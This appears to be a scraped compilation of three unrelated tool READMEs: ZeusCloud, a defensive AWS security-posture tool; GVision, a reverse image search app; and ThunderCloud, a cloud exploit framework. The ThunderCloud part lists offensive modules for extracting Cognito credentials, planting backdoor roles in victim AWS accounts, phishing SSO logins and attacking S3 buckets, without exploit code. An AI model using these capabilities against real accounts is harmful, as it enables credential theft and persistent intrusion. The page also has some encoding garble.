Discover, prioritize, and remediate your risks in the cloud.

  • Build an asset inventory of your AWS accounts.
  • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
  • Prioritize findings with graphical context.
  • Remediate findings with step by step instructions.
  • Customize security and compliance controls to fit your needs.
  • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

Quick Start

  1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
  2. Run: cd ZeusCloud && make quick-deploy
  3. Visit http://localhost:80

Check out our Get Started guide for more details.

A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

Sandbox

Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

Features

  • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
  • Graphical Context - Understand context behind security findings with graphical visualizations.
  • Access Explorer - Visualize who has access to what with an IAM visualization engine.
  • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
  • Configurability - Configure which security rules are active, which alerts should be muted, and more.
  • Security as Code - Modify rules or write your own with our extensible security as code approach.
  • Remediation - Follow step by step guides to remediate security findings.
  • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

Why ZeusCloud?

Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

We had to take action.

  • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
  • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
  • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
  • Best of all, you can use ZeusCloud for free!

Future Roadmap

  • Integrations with vulnerability scanners
  • Integrations with secret scanners
  • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
  • Support for Azure and GCP environments

Contributing

We love contributions of all sizes. What would be most helpful first:

  • Please give us feedback in our Slack.
  • Open a PR (see our instructions below on developing ZeusCloud locally)
  • Submit a feature request or bug report through Github Issues.

Development

Run containers in development mode:

cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

Reset neo4j and/or postgres data with the following:

rm -rf .compose/neo4j
rm -rf .compose/postgres

To develop on frontend, make the the code changes and save.

To develop on backend, run

docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

To access the UI, go to: http://localhost:80.

Security

Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

Open-source vs. cloud-hosted

This repo is freely available under the Apache 2.0 license.

We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



GVision - A Reverse Image Search App That Use Google Cloud Vision API To Detect Landmarks And Web Entities From Images, Helping You Gather Valuable Information Quickly And Easily


GVision is a reverse image search app that use Google Cloud Vision API to detect landmarks and web entities from images, helping you gather valuable information quickly and easily.


About Google Cloud Vision API

Google Cloud Vision API is a machine learning-powered image analysis service that provides developers with tools to understand the contents of an image. It can detect objects, faces, text, logos, and more within an image.

Getting Started

Before using the app, you need to obtain a Google Cloud Vision API key.

  • Go to the Google Cloud Platform Console.
  • Create a new project or select an existing one.
  • Enable the Cloud Vision API for your project.
  • Create a service account and download a private key in JSON format.
  • Upload your Google Cloud Vision API key in JSON format by clicking on the Upload a config file button in the sidebar.

๏› ๏ธ
Installation

To install the dependencies, simply run the following command:

pip install -r requirements.txt

Running the app

You can run the app locally by running the following command:

streamlit run gvision.py

Usage

Using GVision is simple and straightforward:

  • Upload your Google Cloud Vision API key in JSON format by clicking on the Upload a config file button in the sidebar.
  • Once the key is uploaded, the app will automatically authenticate with the Google Cloud Vision API.
  • Upload an image in JPG, JPEG, or PNG format by clicking on the Choose an image button.
  • Wait for the app to analyze the image. The app will detect landmarks and web entities present in the image and display them on a map.
  • Choose between the different tile options to view the detected landmarks and web entities.

You can also find links to the Google Cloud Vision API documentation and pricing in the Resources section of the sidebar.

To reset the app to its default state or to clear the uploaded image and results, click on the Reset app button.

Resources

Mentions



ThunderCloud - Cloud Exploit Framework


Cloud Exploit Framework


Usage

python3 tc.py -h

_______ _ _ _____ _ _
|__ __| | | | / ____| | | |
| | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
| | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
| | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
\_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|


usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
[-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]

Attack modules of cloud AWS

optional arguments:
-h, --help show this help message and exit
-ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
to verify if cognito endpoint is vulnerable and to extract credentials
-reg REGION, --region REGION
AWS region of the resource
-accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
AWS account of the victim
-aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
AWS access keys of the victim account
-aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
AWS secret key of the victim account
-bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
Name of the backdoor role in victim role
-sso SSO_URL, --sso_url SSO_URL
AWS SSO URL to phish for AWS credentials
-enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
To enumerate and assume account roles in victim AWS roles
-s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
Execute upload attack on S3 bucket
-conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
Azure Shared Access key for readingservicebus/queues/blobs etc
-blob BLOB, --blob BLOB
Azure blob enumeration
-shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
Azure shared key

Requirements

* python 3
* pip
* git

Installation

 - get project `git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/`   
- install [virtualenv](https://virtualenv.pypa.io/en/latest/) `pip install virtualenv`
- create a python 3.6 local enviroment `virtualenv -p python3.6 venv`
- activate the virtual enviroment `source venv/bin/activate`
- install project dependencies `pip install -r requirements.txt`
- run the tool via `python tc.py --help`

Running ThunderCloud

Examples

python3 tc.py -sso <sso_url> --region <region>
python3 tc.py -ce <cognito_endpoint> --region <region>


โŒ